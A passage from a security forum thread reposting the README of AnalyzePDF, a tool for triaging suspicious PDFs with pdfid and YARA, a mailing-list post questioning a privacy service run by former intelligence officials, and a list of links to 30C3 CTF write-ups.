be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to is and get back a "yes it's ok -or- no, sending it for analysis". AnalyzePDF can be downloaded on my github [h=2]Further Reading[/h] Research papers (one | two | three) [PDF] PDFTricks PDF Overview Posted by hiddenillusion Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
  23. AnalyzePDF.py Analyzes PDF files by looking at their characteristics in order to add some intelligence into the determination of them being malicious or benign. Requirements * pdfid * pdfinfo * yara Usage $ python AnalyzePDF.py -h usage: AnalyzePDF.py [-h] [-m MOVE] [-y YARARULES] Path Produces a high level overview of a PDF to quickly determine if further analysis is needed based on it's characteristics positional arguments: Path Path to directory/file(s) to be scanned optional arguments: -h, --help show this help message and exit -m MOVE, --move MOVE Directory to move files triggering YARA hits to -y YARARULES, --yararules YARARULES Path to YARA rules. Rules should contain a weighted score in the metadata section. (i.e. weight = 3) example: python AnalyzePDF.py -m tmp/badness -y foo/pdf.yara bar/getsome.pdf Restrictions Free to use for non-commercial. Give credit where credit is due. Sursa & Download: https://github.com/hiddenillusion/AnalyzePDF
  24. [h=1]A Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer[/h]Hi all, there's a Tor-like service run by former NSA/TAO Director & CIA National Clandestine Service Senior Officer. It seems a Commercial Onion Routing Privacy Service for US enterprises and Government Agencies. It's called NetAbstraction: NetAbstraction | Internet Privacy Protection "NetAbstraction is a Cloud-based service that obscures and varies your network pathways, while protecting your identity and your systems." They say to fully cooperate with Law Enforcement from NetAbstraction | Internet Privacy Protection Behind NetAbstraction there's a company, Cutting Edge CA: Cutting Edge C. A. | Advanced Cloud Applications The president and CTO of Cutting Edge CA is a former NSA "Tailored Access Operation" (TAO) Senior Leader, Miss. Barbara Hunt Barbara Hunt | LinkedIn . >From Miss. Hunt linkedin public profile: " My last position in the Intelligence Community (2008-2012) was as Director of Capabilities for Tailored Access Operations at the National Security Agency. As a member of NSA/TAO's senior leadership team, was responsible for end-to-end development and capabilities delivery for a large scale computer network exploitation effort" Works here also a former 24 years CIA Senior Operations Officer that was in charge of National Clandestine Service, Mr. Bay. >From Cutting Edge C. A. | Advanced Cloud Applications : "Mr. Bay is a retired CIA Senior Operations Officer with 24 years of experience conducting a full range of intelligence operations for the National Clandestine Service, including operational innovation and implementation of telecommunications and information technology programs. Mr. Bay also brings extensive experience in alternate persona research, planning, acquisition, and use." It would be very interesting if someone would spent some more time investigating it, to get a bit more a in depth picture, other than just my early OSINT. Former spy, experts on COMINT and SIGINT, running an online privacy service? mmmmmmmmmmm... -- Fabio Pietrosanti (naif) HERMES - Center for Transparency and Digital Human Rights HERMES Center for Transparency and Digital Human Rights - Makers of Tor2Web, GlobaLeaks, LeakDirectory - http://globaleaks.org - tor2web: browse the anonymous internet Sursa: https://lists.torproject.org/pipermail/tor-talk/2014-January/031554.html
  25. 30C3 CTF writups collection PWN cwitscher 350 http://pastebin.com/jMbTX521 bittorrent 400 todos 300 http://codezen.fr/2013/12/30/30c3-ctf-pwn-300-todos-write-up-sql-injection-ret2libc/ http://balidani.blogspot.in/2013/12/30c3-ctf-todos-writeup.html bigdata 400 DOGE1 100 http://thehackerblog.com/such-ctf-very-wow-30c3-doge1-writeup/ http://tasteless.se/2013/12/30c3-ctf-doge1-writeup/ DOGE2 400 http://pastebin.com/81CY5Pg2 HolyChallenge 500 http://blog.dragonsector.pl/2013/12/30c3-ctf-holychallenge-pwn-500.html SANDBOX int80 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-int80-sandbox-300.html yass 400 PyExec 300 http://blog.dragonsector.pl/2013/12/30c3-ctf-pyexec-sandbox-300.html http://delimitry.blogspot.in/2013/12/30c3-ctf-2013-sandbox-300-pyexec-writeup.html MISC notesEE 400 rsync 200 http://tasteless.se/2013/12/30c3-ctf-rsync-writeup/ http://dr0x0n.blogspot.in/2013/12/writeup-30c3-ctf-2013-rsync-200-rsync.html cableguy 100 NUMBERS fourier 200 http://d.hatena.ne.jp/waidotto/20131230 guess 100 http://tasteless.se/2013/12/30c3-ctf-guess-writeup/ matsch 300 angler 300 http://blog.zachorr.com/30C3-CTF-Numbers-300-angler/ Posted by Deva 30C3 CTF – PWN 300
×
×
  • Create New...